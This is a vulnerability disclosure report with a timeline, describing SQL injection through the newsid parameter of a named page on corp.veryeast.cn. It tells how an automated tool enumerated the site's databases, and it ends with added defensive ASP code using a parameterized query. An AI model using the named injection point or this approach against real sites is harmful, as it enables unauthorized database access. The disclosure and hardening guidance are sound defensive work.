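2014-04-17: Details reported to the vendor; awaiting vendor handling
2014-04-17: Vendor confirmed; details disclosed to the vendor only
2014-04-27: Details disclosed to core white hats and experts in related fields
2014-05-07: Details disclosed to regular white hats
2014-05-17: Details disclosed to intern white hats
2014-06-01: Details disclosed to the public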
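VeryEast (最佳东方) does take security fairly seriously~~~
Affected site:
corp.veryeast.cn
Vulnerable URL:
http://corp.veryeast.cn/question/getresult.asp?newsid=
The newsid parameter does not filter single quotes and returns an error, so this is an obvious injection point.
I didn't bother doing it by hand and just ran a tool against it.
Databases: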
32 databases~~
Current database: veryeastcms
Tables:
With this many tables, it is easy to see how large the data volume is.
Admin accounts:
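This was only a test, so I stopped here and did not go any deeper~~
Filter the input~
Severity: High
Vulnerability Rank: 20
Confirmed at: 2014-04-17 15:30
Vulnerability confirmed, thanks @卡卡
2014-04-17: Vulnerability fixed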
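
The "filter the input" fix recommended above, sketched for a classic ASP page that reads newsid: strict integer validation followed by a bound ADO parameter, so the value never becomes part of the SQL text. This is an added example, not the vendor's actual fix or code from the report; the table and column names (QuestionResult, NewsID, Title) and the Application("ConnString") setting are hypothetical.

```vbscript
<%
Option Explicit
' Added example: hardened handling of the newsid query parameter.
' Table, column and connection-string names are hypothetical.

Const adCmdText = 1
Const adInteger = 3
Const adParamInput = 1

' Accept only a plain decimal integer of at most 9 digits (fits in a Long);
' return -1 for anything else, including quotes, signs and whitespace.
Function ParseNewsId(raw)
    Dim re
    ParseNewsId = -1
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    If re.Test(raw) Then ParseNewsId = CLng(raw)
End Function

Dim newsId, conn, cmd, rs
newsId = ParseNewsId(Trim(Request.QueryString("newsid") & ""))
If newsId < 1 Then
    ' Reject malformed input before any database call is made.
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")   ' hypothetical: a low-privilege login

' The value is sent as a typed parameter, never concatenated into the query.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT Title FROM QuestionResult WHERE NewsID = ?"
cmd.Parameters.Append cmd.CreateParameter("@newsid", adInteger, adParamInput, , newsId)

Set rs = cmd.Execute
Do Until rs.EOF
    Response.Write Server.HTMLEncode(rs("Title") & "") & "<br>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```

The report also shows that the page returned database errors to the client and that its database login could see 32 databases, so detailed errors should be logged server-side rather than displayed, and the site's login should be restricted to the one database it needs.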